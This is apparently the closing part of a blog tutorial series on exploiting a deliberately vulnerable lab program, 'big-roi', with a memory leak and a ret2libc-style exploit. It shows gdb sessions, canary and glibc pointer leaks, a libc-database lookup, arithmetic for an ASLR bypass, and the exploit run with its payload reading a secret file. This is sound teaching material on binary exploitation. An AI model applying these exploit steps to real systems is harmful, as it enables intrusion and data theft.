We can test the exploit using the clearenv address we obtained from the gdb’ed big-roi process:

$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7ffff7ddf830
initial output from vulnerable program: 'incorrect password: <snip>'
call stack canary: '0xca9055feff69a500'
preserving chunk: '0x00005555555553e0'
preserving chunk: '0x00005555555559d0'
preserving chunk: '0x00007fffffffe550'
existing return instruction pointer: '0x0000555555555768'
clearenv address: '0x00007ffff7ddf830'
sending payload: 0x<snip>004cf6a1794162dce053555555550000d05955555555000050e5ffffff7f000030f8ddf7ff7f00006857555555550000
getting secret file contents...
secret file contents: 'foobar
'

Locating glibc addresses

While we have successfully validated our exploit in a test environment, we still need to find clearenv’s address without the debugger’s help. Incidentally, we do need to rely on gdb just a bit more. As we examined in part two, if we can find pointers to glibc code on the stack, we can use them to work our way back to the glibc version used at runtime. Since the stack layout will be the same regardless of ASLR or other mitigations, we can simply leak those addresses by knowing where they are in the Go slice.

Start big-roi in gdb again:

$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data

And run the “leak” Go program again, this time redirecting stderr to stdout and grepping for “ 7f”. This will filter for potential library mappings (recall from part two that this is the memory region where libraries are typically mapped to on Linux):

$ go run cmd/leak/main.go 127.0.0.1:6666 2>&1 | grep ' 7f'
chunk 1: 7fffffffe4b0
chunk 4: 7fffffffe8c6
chunk 10: 7fffffffe5d0
chunk 12: 7fffffffe6c0
chunk 15: 7fffffffe6c0
chunk 18: 7fffffffe5d0
chunk 19: 7ffff7e2800d
chunk 21: 7ffff7f826a0
chunk 25: 7ffff7e29ad1
chunk 42: 7fffffffe550
chunk 44: 7fffffffe8c6
chunk 46: 7fffffffe5d0
chunk 48: 7fffffffe6c8

And once again pause big-roi’s execution with ctrl+c and look up each address to see if it is associated with a glibc symbol:

^C
Program received signal SIGINT, Interrupt.
# Chunk 1:
(gdb) info symbol 0x7fffffffe4b0
No symbol matches 0x7fffffffe4b0.
# Chunk 4:
(gdb) info symbol 0x7fffffffe8c6
No symbol matches 0x7fffffffe8c6.
# Chunk 10:
(gdb) info symbol 0x7fffffffe5d0
No symbol matches 0x7fffffffe5d0.
# Chunk 12:
(gdb) info symbol 0x7fffffffe6c0
No symbol matches 0x7fffffffe6c0.
# Chunk 19:
(gdb) info symbol 0x7ffff7e2800d
_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 21:
(gdb) info symbol 0x7ffff7f826a0
_IO_2_1_stdout_ in section .data of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 25:
(gdb) info symbol 0x7ffff7e29ad1
_IO_do_write + 177 in section .text of /lib/x86_64-linux-gnu/libc.so.6

When info symbol finds an address inside a known symbol, it prints not only the symbol name and the address’s offset from the start of that symbol, but also the memory-mapped object the symbol originates from. As seen above, chunks 19, 21, and 25 point into the glibc shared object /lib/x86_64-linux-gnu/libc.so.6.
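
If you want to record these results programmatically, the info symbol lines can be split into their three parts. This is a rough sketch that assumes the exact "name + offset in section X of path" shape seen above and Go 1.18 or newer (for strings.Cut). The symbolRef type and parseInfoSymbol function are hypothetical names, not part of gdb or the big-roi repository.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// symbolRef holds the pieces of one "info symbol" result (hypothetical type).
type symbolRef struct {
	Name   string // symbol name, e.g. _IO_file_write
	Offset uint64 // decimal offset after "+", or 0 if absent
	Object string // path of the memory-mapped object
}

// parseInfoSymbol parses lines shaped like:
//   _IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6
func parseInfoSymbol(line string) (symbolRef, error) {
	head, object, ok := strings.Cut(line, " of ")
	if !ok {
		return symbolRef{}, errors.New("missing object path")
	}
	head, _, ok = strings.Cut(head, " in section ")
	if !ok {
		return symbolRef{}, errors.New("missing section name")
	}

	name, off, hasOffset := strings.Cut(head, " + ")
	ref := symbolRef{Name: strings.TrimSpace(name), Object: strings.TrimSpace(object)}
	if hasOffset {
		n, err := strconv.ParseUint(strings.TrimSpace(off), 10, 64)
		if err != nil {
			return symbolRef{}, fmt.Errorf("bad offset %q: %w", off, err)
		}
		ref.Offset = n
	}
	return ref, nil
}

func main() {
	ref, err := parseInfoSymbol("_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6")
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Printf("%s is %d bytes into %s\n", ref.Name, ref.Offset, ref.Object)
}
```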

Note that gdb’s x command adds the word new to glibc symbol names when examining memory. This can add a layer of confusion when debugging an exploit.

Exploiting big-roi for real

We have automated both the information leak and the exploit, and verified that both work in a test environment. It is time to exploit big-roi outside of gdb. The steps involved will be mostly the same, but this time we will add a little bit of basic arithmetic.

Start by running big-roi outside of gdb:

$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ /tmp/big-roi 6666 /tmp/secret-data

In another shell, run the leak program and find the memory chunk indexes that contain glibc pointers from earlier:

$ go run cmd/leak/main.go 127.0.0.1:6666
# ...
chunk 19: 7f3568bf400d
chunk 21: 7f3568d4e6a0
chunk 25: 7f3568bf5ad1
# ...

Before we can look these symbols up in a glibc database tool like libc.blukat.me, we need to do a bit of math. Remember, some of these addresses point several bytes past the start of their symbol. We need to subtract those offsets like so:

# Chunk 19: _IO_file_write + 45
0x7f3568bf400d - 0x2d = 0x7f3568bf3fe0
# Chunk 21: _IO_2_1_stdout_
0x7f3568d4e6a0
# Chunk 25: _IO_do_write + 177
0x7f3568bf5ad1 - 0xb1 = 0x7f3568bf5a20
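
The same subtraction, sketched in Go with the leaked values and offsets from above. The leak type and symbolStart function are hypothetical names for illustration. The sketch also prints the low 12 bits of each result, on the assumption that the database matches on those bits (ASLR shifts mappings by whole 4 KiB pages, so they do not change between runs).

```go
package main

import "fmt"

// leak pairs a leaked pointer with the symbol and offset gdb reported for it.
// (Hypothetical type for illustration.)
type leak struct {
	symbol string
	addr   uint64 // value leaked from the stack
	offset uint64 // bytes past the symbol start, per "info symbol"
}

// symbolStart rewinds a leaked pointer to the first byte of its symbol.
func symbolStart(l leak) uint64 {
	return l.addr - l.offset
}

func main() {
	leaks := []leak{
		{"_IO_file_write", 0x7f3568bf400d, 45},
		{"_IO_2_1_stdout_", 0x7f3568d4e6a0, 0},
		{"_IO_do_write", 0x7f3568bf5ad1, 177},
	}

	for _, l := range leaks {
		start := symbolStart(l)
		// The low 12 bits survive ASLR because the base is page-aligned.
		fmt.Printf("%s start=%#x low12=%#x\n", l.symbol, start, start&0xfff)
	}
}
```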

Use one of the glibc databases we discussed in part two to look up the symbols. In my case, libc.blukat.me narrowed it down to three possibilities:

libc6_2.31-0ubuntu9.1_amd64
libc6_2.31-0ubuntu9.2_amd64
libc6_2.31-0ubuntu9_amd64

In the real world, you would need to test all three versions. To keep things simple, we will pretend we did that and found that option two (ubuntu9.2_amd64) is the target. These databases typically provide the offset of each symbol from the beginning of the file. This matters because subtracting a symbol’s offset from its runtime address reveals the base address of glibc. From there, adding the offset of clearenv yields the absolute address of the function:

# <_IO_file_write addr>  <offset>   <glibc base addr>
0x7f3568bf3fe0         - 0x091fe0 = 0x7f3568b62000

# <glibc base addr>  <clearenv offset>  <clearenv addr>
0x7f3568b62000     + 0x049830         = 0x7f3568bab830
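
The two calculations above can be sketched as a small Go helper. The resolve function and pageSize constant are hypothetical names, not part of the exploit program. The page-alignment check is an added sanity test of my own: a shared object is mapped at a page-aligned base, so a misaligned result suggests the wrong glibc candidate or a bad leak.

```go
package main

import (
	"errors"
	"fmt"
)

// pageSize is the usual 4 KiB page size on x86-64 Linux.
const pageSize = 0x1000

// resolve derives the glibc base from one known symbol and then computes the
// runtime address of a target symbol. (Hypothetical helper for illustration.)
func resolve(symAddr, symOffset, targetOffset uint64) (base, target uint64, err error) {
	if symAddr < symOffset {
		return 0, 0, errors.New("symbol offset is larger than its address")
	}
	base = symAddr - symOffset
	if base%pageSize != 0 {
		return 0, 0, fmt.Errorf("base %#x is not page-aligned; wrong glibc candidate?", base)
	}
	return base, base + targetOffset, nil
}

func main() {
	// Values from this post: the adjusted _IO_file_write address, plus the
	// _IO_file_write and clearenv offsets for libc6_2.31-0ubuntu9.2_amd64.
	base, clearenv, err := resolve(0x7f3568bf3fe0, 0x091fe0, 0x049830)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("glibc base: %#x\nclearenv:   %#x\n", base, clearenv)
}
```

Running the same check against each candidate version's offsets is a cheap way to rule out some mismatches before sending a payload, although candidates whose offsets happen to agree will still need to be tested.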

Finally, plug the calculated address of clearenv into the exploit program:

$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7f3568bab830
initial output from vulnerable program: 'incorrect password: <...>'
call stack canary: '0xdb1d60c36b92ed00'
preserving chunk: '0x000056321d4b53e0'
preserving chunk: '0x000056321d4b59d0'
preserving chunk: '0x00007fff6b51c0a0'
existing return instruction pointer: '0x000056321d4b5768'
clearenv address: '0x00007f3568bab830'
sending payload: 0x<...>00ed926bc3601ddbe0534b1d32560000d0594b1d32560000a0c0516bff7f000030b8ba68357f000068574b1d32560000
getting secret file contents...
secret file contents: 'foobar
'

w00t!

Conclusion

In this series, we examined glibc’s relationship with a vulnerable program and an exploit. We located useful process state by capitalizing on the repeatability of the call stack layout, the default higher bits of addresses (0x00007f and 0x000055), and the structure of a call stack canary. We also explored techniques for working around mitigations like ASLR and NX.

A high-level understanding of these topics allowed us to discover and leak useful information about a vulnerable program. We automated the creation and delivery of our exploit using two simple Go programs, which ultimately allowed us to bypass the vulnerable program’s built-in defenses.

The overall strategy remains largely the same despite thirty years of advancements in defenses: find a way to subvert a process' control flow, locate useful glibc code, and pivot execution to that code. Unfortunately, documentation on this subject is often fragmented or was written before the introduction of contemporary mitigations.

While esoteric, I believe this information should be accurate and easy to obtain, not only so others can learn about binary exploitation, but also so we can learn from the shortcomings of iterative security mitigations.

Thank you for reading. Good night, and good luck.

References

blog.zecops.com. 2021, July 17. “Meet WiFiDemon - iOS WiFi RCE 0-day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched”.
scut / Team TESO. 2001, September 1. “Exploiting Format String Vulnerabilities (version 1.2)”.
david942j. Accessed: 2022, April 20. “one_gadget - The best tool for finding one gadget RCE in libc.so.6”.
linux.die.net. Accessed: 2022, May 1. “unsetenv(3) - Linux man page”.
linux.die.net. Accessed: 2022, May 1. “clearenv(3) - Linux man page”.
Bendersky, Eli. 2011, September 6. “Stack frame layout on x86-64”.
cons.mit.edu. 2017. “X86-64 Architecture Guide”.
Krzyzanowski, Paul. 2018, February 16. “Stack frames”.
felixcloutier.com. Accessed: 2022, May 1. “RET - Return from Procedure”.

2022-08-16

control.rip